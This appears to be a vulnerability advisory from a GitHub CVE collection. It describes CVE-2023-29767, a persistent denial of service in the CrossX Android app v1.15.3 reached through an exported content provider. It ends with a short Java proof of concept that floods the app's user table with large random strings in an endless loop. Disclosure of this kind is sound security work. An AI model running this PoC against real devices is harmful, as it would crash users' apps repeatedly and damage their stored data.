CVE-2023-29767: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Denial of Service exists in CrossX（CVE-2023-29767）

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause a persistent denial of service via the database files.

Additional information: The CrossX application allows unauthorized applications to inject data into the database via interfaces in the components it exposes, which will be loaded from the database into memory upon opening the app. Once an attacker injects an excessive amount of data, it can cause the application to trigger an OOM error and crash. The user cannot completely fix the above problem by restarting the application because the data is stored persistently in the database, which eventually leads to persistent denial of service.

poc:

public void attack_crossx() { Uri uri = Uri.parse(“content://com.startapps.crossx.contentprovider/tb_user”); ContentResolver contentResolver = getApplicationContext().getContentResolver(); while (true) { ContentValues contentValues = new ContentValues(); contentValues.put("email", getRandomString(10240)); contentResolver.insert(uri, contentValues); } }